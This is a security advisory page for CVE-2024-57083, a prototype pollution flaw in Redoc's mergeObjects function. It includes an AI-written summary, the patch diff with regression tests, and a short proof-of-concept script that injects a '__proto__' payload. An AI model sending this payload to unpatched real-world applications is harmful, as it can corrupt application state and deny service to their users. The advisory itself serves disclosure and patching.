VYPR
← All advisories
High severityNVD Advisory· Published Mar 28, 2025· Updated Apr 1, 2025

CVE-2024-57083

CVE-2024-57083

Description

A prototype pollution vulnerability in Redoc's mergeObjects function allows attackers to cause a Denial of Service by supplying a crafted payload.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A prototype pollution vulnerability in Redoc's mergeObjects function allows attackers to cause a Denial of Service by supplying a crafted payload.

Vulnerability

Overview A prototype pollution vulnerability exists in the Module.mergeObjects function within Redoc versions up to 2.2.0. The function recursively copies properties from a source object to a destination without sanitizing special keys such as __proto__ or constructor.prototype. This allows an attacker to inject properties into the global Object.prototype, polluting the prototype chain [2][3].

Exploitation

An attacker can exploit this by supplying a crafted JSON payload containing a __proto__ property to any Redoc instance that processes user-controlled OpenAPI definitions. The provided proof-of-concept demonstrates that after calling mergeObjects with a malicious object, the polluted property becomes accessible on all objects [3]. No authentication is required if the application exposes Redoc to untrusted input.

Impact

While the CVE description notes a Denial of Service (DoS) impact, the issue report indicates that prototype pollution in this context can lead to more severe consequences, including remote code execution (RCE) and cross-site scripting (XSS), depending on how the polluted properties are used by the application [3].

Mitigation

The vulnerability has been addressed in pull request #2638, which adds a check to prevent the assignment of __proto__ and constructor properties [4]. Users should update to a patched version of Redoc as soon as possible. No official workaround has been provided.

References
  1. NVD - CVE-2024-57083
  2. Prototype Pollution Vulnerability Affecting redoc <=2.2.0
  3. fix: Prototype Pollution Vulnerability Affecting redoc <=2.2.0 by KsAkira10 · Pull Request #2638 · Redocly/redoc

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
redocnpm
< 2.4.02.4.0

Affected products

2

Patches

1
153ec7a0b724

fix: Prototype Pollution Vulnerability Affecting redoc <=2.2.0 (#2638)

https://github.com/Redocly/redocLucas Akira UeharaJan 28, 2025via ghsa-ref
commitPR #2638
2 files changed · +32 7
  • src/utils/helpers.ts+8 7 modified
    @@ -81,7 +81,6 @@ export function appendToMdHeading(md: string, heading: string, content: string)
   }
 }
 
-// credits https://stackoverflow.com/a/46973278/1749888
 export const mergeObjects = (target: any, ...sources: any[]): any => {
   if (!sources.length) {
     return target;
@@ -93,13 +92,15 @@ export const mergeObjects = (target: any, ...sources: any[]): any => {
 
   if (isMergebleObject(target) && isMergebleObject(source)) {
     Object.keys(source).forEach((key: string) => {
-      if (isMergebleObject(source[key])) {
-        if (!target[key]) {
-          target[key] = {};
+      if (Object.prototype.hasOwnProperty.call(source, key) && key !== '__proto__') {
+        if (isMergebleObject(source[key])) {
+          if (!target[key]) {
+            target[key] = {};
+          }
+          mergeObjects(target[key], source[key]);
+        } else {
+          target[key] = source[key];
         }
-        mergeObjects(target[key], source[key]);
-      } else {
-        target[key] = source[key];
       }
     });
   }
  • src/utils/__tests__/helpers.test.ts+24 0 modified
    @@ -71,6 +71,30 @@ describe('Utils', () => {
         const obj2 = { a: ['C'], b: ['D'] };
         expect(mergeObjects({}, obj1, obj2)).toEqual({ a: ['C'], b: ['D'] });
       });
+      test('should prevent prototype pollution', () => {
+        const target = {};
+        const source = JSON.parse('{"__proto__": {"polluted": "yes"}}');
+
+        mergeObjects(target, source);
+
+        expect(({} as any).polluted).toBeUndefined();
+      });
+      test('should merge objects correctly', () => {
+        const target = { a: 1 };
+        const source = { b: 2 };
+
+        const result = mergeObjects(target, source);
+
+        expect(result).toEqual({ a: 1, b: 2 });
+      });
+      test('should handle nested objects', () => {
+        const target = { a: { b: 1 } };
+        const source = { a: { c: 2 } };
+
+        const result = mergeObjects(target, source);
+
+        expect(result).toEqual({ a: { b: 1, c: 2 } });
+      });
     });
 
     describe('titleize', () => {

Vulnerability mechanics

Root cause

"Missing filtering of `__proto__` key in `mergeObjects` allows recursive copy of properties onto `Object.prototype`."

Attack vector

An attacker supplies a crafted JSON payload containing a `__proto__` key (e.g., `{"__proto__":{"polluted":true}}`) to the `mergeObjects` function [ref_id=2]. Because the function lacks a check for `__proto__` or `constructor.prototype`, it copies the malicious property onto `Object.prototype`, polluting all objects in the application [CWE-1321]. This can lead to Denial of Service (DoS) by corrupting object behavior across the application [ref_id=2].

Affected code

The vulnerability resides in the `mergeObjects` function in `src/utils/helpers.ts` (bundled as `redoc/bundles/redoc.lib.js`). The function recursively copies source properties to a target object without filtering dangerous keys like `__proto__` [ref_id=2].

What the fix does

The patch adds two guards inside the `Object.keys(source).forEach` loop in `mergeObjects` [patch_id=1640037]. First, it checks `Object.prototype.hasOwnProperty.call(source, key)` to ensure only the source's own properties are copied. Second, it explicitly skips the key `__proto__` with `key !== '__proto__'` [patch_id=1640037]. Together these prevent prototype pollution by blocking the special `__proto__` property from being assigned to the target object.

Preconditions

  • inputThe application must call mergeObjects() with attacker-controlled input (e.g., parsed JSON)
  • authNo authentication required; the attack can be triggered by any user who can supply a crafted payload to the mergeObjects function

Reproduction

```js (async () => { const lib = await import('redoc'); var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}'); var victim = {} console.log("Before Attack: ", JSON.stringify(victim.__proto__)); try { lib.mergeObjects({}, BAD_JSON) } catch (e) { } console.log("After Attack: ", JSON.stringify(victim.__proto__)); delete Object.prototype.polluted; })(); ``` [ref_id=2]

Generated on May 23, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.